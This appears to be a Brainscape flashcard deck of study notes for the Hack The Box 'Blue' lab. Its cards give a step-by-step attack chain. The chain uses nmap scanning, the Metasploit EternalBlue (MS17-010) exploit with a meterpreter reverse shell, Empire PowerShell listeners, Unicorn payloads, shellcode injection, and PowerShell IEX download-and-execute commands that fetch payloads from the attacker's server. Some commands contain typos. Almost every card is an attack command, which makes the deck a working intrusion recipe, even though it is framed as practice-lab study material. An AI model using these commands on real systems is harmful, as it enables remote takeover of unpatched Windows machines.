Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

1. hacking > blue > Flashcards

blue Flashcards

1
Q

What nmap command to tell if vulnerable to eternalblue?

A

nmap -p 445 –script safe -Pn -n 10.10.10.40

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

How to launch Metasploit?

A

msfconsole

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What do you do after you launch metasploit?

A
  • search for metasploit module

- search ms17-010

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What do you do after you locate the eternalblue metasploit module?

A
  • activate the module

- msf5> use exploit/windows/smb/ms17_010_eternalblue

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What do you do after loading the metasploit module?

A
  • set the payload with meterpreter reverse tcp shell

- > set payload windows/x64/meterpreter/reverse_tcp

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What two values do you set for the reverse tcp payload before exploiting?

A
  • set the lhost and rhost values
  • > set lhost tun0
  • > set rhost 10.10.10.40
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is the final step for the eternalblue module after configuring the settings?

A
  • run the exploit

- > exploit -j

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

How do you tell if you have active sessions after running the reverse_tcp payload exploit?

A

> sessions -i

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What do you do after you have a victim machine connected with an reverse tcp payload for the eternalblue exploit?

A
  • Check to make sure Empire is installed.

- Use Empire after it has been installed.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

How do you install Empire if it is not installed?

A 
- install, run setup, and then launch Empire
> cd /opt
> git clone https://github.com/EmpireProject/Empire -b dev
> cd Empire
> cd Setup
> ./install.sh
> cd /opt/Empire
> ./empire
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

How do you get the PowerShell http query from Empire?

A
  • Connect to the http listener, set values, and then generate powershell payload
    (Empire) > listeners
    (Empire: listeners) > uselistener http
    (Empire: listeners/http) > set host http://10.10.14.17:443 (your IP)
    (Empire: listeners/http) > set port 443
    (Empire: listeners/http) > execute
    (Empire: listeners/http) > back
    (Empire: listeners) > launcher powershell http
    *** copy the generated text
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What do you do after you create the PowerShell payload?

A
  • Create ‘http’ directory in ‘blue’ directory, and create empire.ps1 file with the copied text from Empire
    > cd /blue
    > mkdir http
    > cd http
    > vi empire.ps1
    *** paste copied powershell command into file
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What do you do after creating the empire.ps1 file in the http directory?

A
  • Launch an http simple server from w/in http directory

> pypton -m SimpleHTTPServer 80

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What do you do after launching the python simple server?

A
  • connect to the victim session in metasploit and send powershell script to download empire.ps1 file
    > sessions -i 1
    meterpreter > shell
    c:\Windows\system32> powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.16/empire.ps1’)”

*** This results in the victim machine connecting to Empire

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What do you do after the victim machine connects to Empire?

A
  • Install magic unicorn and generate reverse_http payload
    > cd /opt
    > git clone https://github.com/trustedsec/unicorn
    > cd unicorn
    > python unicorn.py windows/meterpreter/reverse_http 10.10.14.16 8002
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What do you do after generating the reverse http payload with unicorn?

A
  • go back to Empire and create the Meterpreter1 listener, inject meterpreter1 shellcode into the powershell process running on the victim machine
    (Empire: M9N3T5H5) > back
    (Empire: listeners) > uselistener meterpreter
    (Empire: listeners/meterpreter) > set port 8002
    (Empire: listeners/meterpreter) > set host http://10.10.14.16:8002
    (Empire: listeners/meterpreter) > execute
    (Empire: listeners/meterpreter) > back
    (Empire) > interact M9N3T5H5
    (Empire: M9N3T5H5) > ps
    (Empire: M9N3T5H5) > injectshellcode meterpreter1 2992 (whatever the PID is)
    (Empire: powershell/code_execution/invoke_shellcode) > set lport 8002
    (Empire: powershell/code_execution/invoke_shellcode) > execute
17
Q

What do you do after injecting the meterpreter1 shellcode into powershell process?

A
  • get the powershell_attack.txt file that was output from Unicorn, place in the blue/http directory, and start a SimpleHTTP python server
    > cd blue/http
    > cp /opt/unicorn/powershell_attack.txt .
    > python -m SimpleServer 80
18
Q

What do you do after launching the python simple server?

A
  • interact with the victim machine in Empire, run powershell command to download the powershell_attack.txt file
    (Empire: powershell/code_execution/invoke_shellcode) > back
    (Empire: M9N3T5H5) > shell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.16/powershell_attack.txt’)

1. hacking (5 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions